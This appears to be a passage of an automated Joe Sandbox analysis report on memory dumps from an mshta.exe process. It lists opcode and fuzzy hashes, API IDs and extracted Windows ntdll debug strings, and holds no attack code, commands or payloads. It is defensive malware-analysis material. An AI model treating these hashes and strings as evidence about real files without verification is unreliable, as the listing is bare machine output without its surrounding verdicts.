                • Opcode ID: 9f47ad60c118ccf9ed60935be4e2fa58c1ce499a9b182863c4bbea5d011b6650
                • Instruction ID: abae17ac2e2c20b808f1a1af3e6c1a6c4818d919181ad98b5f6c7f486c12c20c
                • Opcode Fuzzy Hash: 9f47ad60c118ccf9ed60935be4e2fa58c1ce499a9b182863c4bbea5d011b6650
                • Instruction Fuzzy Hash: F03152B480470CDBCB10DF85D280AEDBB70FF08358F90915EE8056B289D732865ACB89
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: 726e175f95a36e91bf7ac46b827c32ef8abe841166443e623b0fb34a02f04d7c
                • Instruction ID: cf36e5fc050b4f0e36e3185a7e81f38dcd8ca838bcfc640287a62c918b7ab90e
                • Opcode Fuzzy Hash: 726e175f95a36e91bf7ac46b827c32ef8abe841166443e623b0fb34a02f04d7c
                • Instruction Fuzzy Hash: 58510BB6A842167FDF20DB98C8C057EF7B8BB08244750D169EA95D7641D374DE01CBA0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: 5e01659404bdaa9e71648905ec7d3147edce16c8dfd30f07d4a0414ee70801d7
                • Instruction ID: b8d55e9127404abe560161b8d963d2740e38d086726a9b4ca2b78d251e943618
                • Opcode Fuzzy Hash: 5e01659404bdaa9e71648905ec7d3147edce16c8dfd30f07d4a0414ee70801d7
                • Instruction Fuzzy Hash: 57510475A00645AEDB30DE9CC99097FBBF9EF44240B408469FADAD3641EBF4DA40CB60
                Strings
                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F04655
                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F04725
                • ExecuteOptions, xrefs: 02F046A0
                • CLIENT(ntdll): Processing section info %ws..., xrefs: 02F04787
                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F04742
                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F046FC
                • Execute=1, xrefs: 02F04713
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                • API String ID: 0-484625025
                • Opcode ID: 4c93b56f3cf77f8937364d9291aa913b4ecf9607f599bb52e18c91770b49e3bb
                • Instruction ID: 27fa73fe040d8a991f601803319c8a9269bcf3cf8612288a8155855fb3ea1e37
                • Opcode Fuzzy Hash: 4c93b56f3cf77f8937364d9291aa913b4ecf9607f599bb52e18c91770b49e3bb
                • Instruction Fuzzy Hash: C0511731A8031D6AEF10AAE4DD95BE9B3ADEF04345F2450ADE609AB1C0E7709A42CF50
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                • Instruction ID: f2269e13b965f2cc73a14bb9d4ab676005fe78d55d16a05e083ce9b6ee95d7df
                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                • Instruction Fuzzy Hash: E4022671508341AFC304DF18C998A6BBBEAEFC8744F048A6DFA859B254DB35E945CF42
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-$0$0
                • API String ID: 1302938615-699404926
                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction ID: 40bd4ed188e1ef2c903a27ade5a679c38864af08959da19f07b5bd10c8f99ce6
                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction Fuzzy Hash: 2181B278EC52499BDF248E68C4507FEBBA2AF4535CF1AE25DE861A72D0E7348442CB50
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$[$]:%u
                • API String ID: 48624451-2819853543
                • Opcode ID: e2863ddc1429ed09d27c9514ecad2b03bd7674c56286b3b2e0d8ef7368f13047
                • Instruction ID: d1a66a21c9193b0a74fa9a8a64854bb3198b621a0ee4ed3af91f8eee1272d310
                • Opcode Fuzzy Hash: e2863ddc1429ed09d27c9514ecad2b03bd7674c56286b3b2e0d8ef7368f13047
                • Instruction Fuzzy Hash: 0F215676E001199BEB10DF69CC40AEFBBE9AF94784F044126FE45E3200EB70D901CBA1
                Strings
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F002E7
                • RTL: Re-Waiting, xrefs: 02F0031E
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F002BD
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                • API String ID: 0-2474120054
                • Opcode ID: efed3e48df276f81e71a9c44a7aeb3f4e17c15e1be737571822c4648c58301d7
                • Instruction ID: 8692e21b4d649c3eda82f8c43cdc45ae3353df290fbd1e7e8146330a7f084c2e
                • Opcode Fuzzy Hash: efed3e48df276f81e71a9c44a7aeb3f4e17c15e1be737571822c4648c58301d7
                • Instruction Fuzzy Hash: 8BE1F230648741DFD726CF28C884BAAB7E1BF48358F149A5DF5A58BAD0DB74D844CB42
                Strings
                • RTL: Re-Waiting, xrefs: 02F07BAC
                • RTL: Resource at %p, xrefs: 02F07B8E
                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02F07B7F
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 0-871070163
                • Opcode ID: c94662069725169804cbade1d965f360e8eba35baf7b9d4cbcc6e3478ad7db21
                • Instruction ID: bb1d25d9ed3120219ca97cac91294cf45e482b8e1225f9b1aeda06e2a34dd3a4
                • Opcode Fuzzy Hash: c94662069725169804cbade1d965f360e8eba35baf7b9d4cbcc6e3478ad7db21
                • Instruction Fuzzy Hash: 694101317807428FD724DE25CD41B6AB7E6EF88718F105A1DF95A9B780DB30E8068F91
                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F0728C
                Strings
                • RTL: Re-Waiting, xrefs: 02F072C1
                • RTL: Resource at %p, xrefs: 02F072A3
                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02F07294
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 885266447-605551621
                • Opcode ID: 200dc4f94fc628acca0fd7d4d4d3fd78a383f7c070c433ae6c63ad51443b02ce
                • Instruction ID: af767c96c2420102ef9af438fe3774b892b0df6b8834b3002ce640d7a97ac90e
                • Opcode Fuzzy Hash: 200dc4f94fc628acca0fd7d4d4d3fd78a383f7c070c433ae6c63ad51443b02ce
                • Instruction Fuzzy Hash: E9412231B44242ABD720EE64CC81B66B3A6FF58758F20465CFA55EB280DB30F802DBD0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$]:%u
                • API String ID: 48624451-3050659472
                • Opcode ID: 3e3f5a995d1c0ebedce7f9a2d9642d875d3a6fad092e1e72135be101a50e4ad7
                • Instruction ID: 11880900db8c4597130078fbf8f3746de31df9d8d3bf845f94c372d7204f5cd4
                • Opcode Fuzzy Hash: 3e3f5a995d1c0ebedce7f9a2d9642d875d3a6fad092e1e72135be101a50e4ad7
                • Instruction Fuzzy Hash: 60315472A006199FDB20DF29DC40BFEBBB9EB44654F444565FD49E3240EF709A458FA0
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4607115675.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_31b0000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: iq$iq$iq$iq$iq
                • API String ID: 0-718299175
                • Opcode ID: 711543e218ceafe5d13385c83b04562454eede7462914baf69931a9415a317cb
                • Instruction ID: 3d577c278c1fa27baf160cb9cf1dd69250b8fbf68c91175d49a777f4d922e9c2
                • Opcode Fuzzy Hash: 711543e218ceafe5d13385c83b04562454eede7462914baf69931a9415a317cb
                • Instruction Fuzzy Hash: 5E215731808B4DCFCF44EFA4C8856EEBBB0FB68300F40012AD909E7252D7359A45CB92
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4607115675.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_31b0000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: iq$iq$iq$iq$iq
                • API String ID: 0-718299175
                • Opcode ID: 5e3cf42a709f8cb8da0dd28dc1ee9d6b5b357e8460c252dbe12edff236344b2a
                • Instruction ID: 2a547339746b68c57fbb13a01c7a4ec0b9aa7c2dae9b8bd25a44a7f7eba11e1e
                • Opcode Fuzzy Hash: 5e3cf42a709f8cb8da0dd28dc1ee9d6b5b357e8460c252dbe12edff236344b2a
                • Instruction Fuzzy Hash: 58214531808B4DCFCF84EFA4C8856EEBBB0FB28300F40012AD909E7251D7348A44CBA2
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-
                • API String ID: 1302938615-2137968064
                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction ID: cd668ce85ee8684dd8f187ced9720b7b60d0ea94aa51067f78c207d3de4682cb
                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction Fuzzy Hash: 9591A170E802169ADB34DF6AC8817BEF7A5AF45728F54E61AEC55EB2C0D7308943CB50
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: $$@
                • API String ID: 0-1194432280
                • Opcode ID: 1e5323894c764c93f13a6165126f2ad70e6b00b2af36e22826b602ee9fdba757
                • Instruction ID: 91b5476270ef34728a06d6ef76ad754cca990fe097c1014cd756bf403e3e5c86
                • Opcode Fuzzy Hash: 1e5323894c764c93f13a6165126f2ad70e6b00b2af36e22826b602ee9fdba757
                • Instruction Fuzzy Hash: AC812A71D402699BDB35CB54CC44BEEB7B8AF08754F0191EAEA09B7240E7309E84CFA0
                APIs
                • @_EH4_CallFilterFunc@8.LIBCMT ref: 02F1CFBD
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: CallFilterFunc@8
                • String ID: @$@4Cw@4Cw
                • API String ID: 4062629308-3101775584
                • Opcode ID: e45ccb36a3a60d78400cb4a358d99120e79eb45ec7d4889a7008afef04d546fc
                • Instruction ID: f7fcfa17b9f05ac49da73ecf0973d51538b5feb250e34c2b7f7a2963907acb6c
                • Opcode Fuzzy Hash: e45ccb36a3a60d78400cb4a358d99120e79eb45ec7d4889a7008afef04d546fc
                • Instruction Fuzzy Hash: 2E417C71E40218DFDB219FA5C940AAEFBB9EF44B84F00856AEA15DB264D734D801CF61